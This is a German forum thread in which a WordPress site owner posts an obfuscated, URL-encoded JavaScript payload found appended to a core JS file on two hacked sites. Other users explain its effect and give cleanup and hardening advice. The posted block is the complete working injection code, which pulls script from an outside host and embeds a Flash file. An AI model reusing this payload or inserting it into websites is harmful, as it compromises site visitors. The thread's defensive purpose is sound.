kostenloser Webspace werbefrei: lima-city


Malware auf Wordpress Webseite

lima-cityForumProgrammiersprachenPHP, MySQL & .htaccess

  1. Autor dieses Themas

    ellogro2009

    Kostenloser Webspace von ellogro2009

    ellogro2009 hat kostenlosen Webspace.

    Hallo,
    Ich habe auf 2 meiner Webseiten (beides Wordpress Installationen) eine Malware Meldung von Google erhalten.
    Ich habe mich sofort auf die Suche gemacht und habe folgendes gefunden:

    eval(decodeURIComponent('%0D%0A%76%61%72%20%5F%5F%5F%73%63%73%63%73%63%20%3D%20%6E%75%6C%6C%3B%0D%0A%76%61%72%20%5F%5F%5F%65%6D%65%6D%65%6D%20%3D%20%6E%75%6C%6C%3B%0D%0A%0D%0A%0D%0A%76%61%72%20%55%55%5F%44%79%6E%53%63%72%20%3D%20%66%75%6E%63%74%69%6F%6E%28%70%53%72%63%29%0D%0A%7B%0D%0A%09%76%61%72%20%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%22%73%63%72%69%70%74%22%29%3B%20%73%2E%74%79%70%65%20%3D%20%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3B%20%73%2E%73%72%63%20%3D%20%70%53%72%63%3B%20%64%6F%63%75%6D%65%6E%74%2E%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%29%3B%20%72%65%74%75%72%6E%20%73%3B%0D%0A%7D%0D%0A%0D%0A%76%61%72%20%55%55%5F%53%69%6E%6B%53%68%69%74%20%3D%20%66%75%6E%63%74%69%6F%6E%28%70%50%65%74%75%73%68%6F%6B%29%0D%0A%7B%0D%0A%09%5F%5F%5F%73%63%73%63%73%63%20%3D%20%55%55%5F%44%79%6E%53%63%72%28%27%68%74%74%70%3A%2F%2F%61%6A%61%78%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%73%77%66%6F%62%6A%65%63%74%2F%32%2E%32%2F%73%77%66%6F%62%6A%65%63%74%5F%73%72%63%2E%6A%73%27%29%3B%0D%0A%09%0D%0A%09%5F%5F%5F%73%63%73%63%73%63%2E%6F%6E%6C%6F%61%64%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%09%7B%0D%0A%09%09%69%66%20%28%20%21%5F%5F%5F%65%6D%65%6D%65%6D%20%29%0D%0A%09%09%7B%0D%0A%09%09%09%5F%5F%5F%65%6D%65%6D%65%6D%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%64%69%76%27%29%3B%0D%0A%09%09%09%5F%5F%5F%65%6D%65%6D%65%6D%2E%69%64%20%3D%20%27%66%72%66%72%66%72%5F%73%68%69%74%27%3B%0D%0A%09%09%09%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%5F%5F%5F%65%6D%65%6D%65%6D%29%3B%0D%0A%09%09%09%0D%0A%09%09%09%76%61%72%20%66%76%20%3D%20%7B%20%64%61%6C%69%6E%6B%3A%20%70%50%65%74%75%73%68%6F%6B%7D%3B%0D%0A%09%09%09%73%77%66%6F%62%6A%65%63%74%2E%65%6D%62%65%64%53%57%46%28%27%2E%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%6A%73%2F%73%77%66%6F%62%6A%63%74%2E%73%77%66%27%2C%20%22%66%72%66%72%66%72%5F%73%68%69%74%22%2C%20%22%31%36%22%2C%20%22%31%36%22%2C%20%22%39%2E%30%2E%30%22%2C%20%66%61%6C%73%65%2C%20%66%76%29%3B%0D%0A%09%09%7D%0D%0A%09%7D%0D%0A%7D%0D%0A%0D%0A%2F%2F%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%0D%0A%0D%0A%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%0D%0A%76%61%72%20%73%63%72%69%70%74%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%0D%0A%73%63%72%69%70%74%2E%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%0D%0A%73%63%72%69%70%74%2E%73%72%63%3D%27%68%74%74%70%3A%2F%2F%61%64%73%2E%61%6B%65%65%6D%64%6F%6D%2E%63%6F%6D%2F%64%62%32%36%27%3B%0D%0A%73%63%72%69%70%74%2E%69%64%3D%27%79%6F%79%6F%79%6F%5F%73%68%69%74%27%3B%0D%0A%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A'));



    Was bewirkt dieser Code? Welchen Schaden richtet er an? Wie verhindere ich das in Zukunft?


    Freundliche Grüsse
    ellogro2009
  2. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

  3. Auf den ersten Blick sieht es so aus, daß dieser Code ein zusätzliches DIV auf deiner Seite einrichtet und dort Code von einer fremden Seite platziert.
    Um zu beurteilen, welchen Schaden er anrichtet, müßte man genauer schauen. Fakt ist, das gehört nicht auf die Seite und sollte schleunigst beseitigt werden.


    Wo hast Du diesen Code gefunden?
    Benutzt Du eine aktuelle Version von Wordpress?
    Sind die Plugins alle aktuell?
    Kommt das verwendete Template aus einer zuverlässigen Quelle?

    Maßnahmen:

    a) Die Seite vom Netz nehmen. Nicht löschen! Beste Wahl wäre, den Homeordner umzubenennen.
    b) Passwörter von FTP und Datenbank ändern
    c) Backup von Datenbank und Webspace anlegen
    d) Suche nach Ursachen
    e) Desinfektion der Installation
  4. Bei Wordpress war ja wie bei Drupal eine gravierende Sicherheitslücke gefunden worden, bei WP betrifft es alle Versionen von 3.0 - 3.9.2.. d.H. wenn man nicht regelmässig seine Installation updatet läuft man relativ einfach Gefahr so kompromittiert zu werden.

    https://wordpress.org/news/2014/11/wordpress-4-0-1/

    Beitrag zuletzt geändert: 27.12.2014 19:40:23 von c22
  5. Autor dieses Themas

    ellogro2009

    Kostenloser Webspace von ellogro2009

    ellogro2009 hat kostenlosen Webspace.

    Bei beiden Seiten handelt es sich um Wordpress 3.9.x die ich sofort geupdatet habe ohne genau auf die Version zu schauen. Beim Template handelt es sich um ein Original von Wordpress (Twenty Twelve 1.5) dies habe ich eben gleich auf 1.6 aktualisiert.

    Der Schadcode befand sich unter httpdocs/wp-includes/js/json2.min.js am Ende der Datei (https://www.dropbox.com/s/pmg0666ilh32zkw/Screenshot%202014-12-27%2019.49.19.png?dl=0)

    Plugins:
    https://www.dropbox.com/s/i695ea1l3t4nnrg/Screenshot%202014-12-27%2019.44.15.png?dl=0

    Bei der anderen Seite selbes Schadensbild jedoch etwas andere Plugins, ich gehe jedoch von der selben Methode aus.
    Wie wird dieser Code im­ple­men­tie­rt? Durch falsche Dateiberechtigung oder via FTP?

    Freundliche Grüsse
    ellogro2009
  6. webdesignerin

    Kostenloser Webspace von webdesignerin

    webdesignerin hat kostenlosen Webspace.

    Hallo ellogro2009, :wave:

    solche Skripte stammen meistens von unsauberen Plugins, sog. "nulled scripts". In diesem Fall scheint es sich aber um eine bekannte Sicherheitslücke des Plugins "Download Manager" zu handeln.

    Siehe: WordPress Security: Serious Vulnerability in WordPress Download Manager

    Ich kann Dir nur raten Wordfence zu installieren und zu nutzen, denn es warn Dich vor dubiosen Änderungen an Dateien und sagt Dir auch was genau geändert wurde. So kommst Du zukünftig Schadcode schneller und leichter auf die Spur. Ach und den Newsletter von Wordfence würde ich auch gleich abonnieren - es lohnt sich up to date zu sein! :wink:


    Gruß,
    webdesignerin :angel:
  7. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

Dir gefällt dieses Thema?

Über lima-city

Login zum Webhosting ohne Werbung!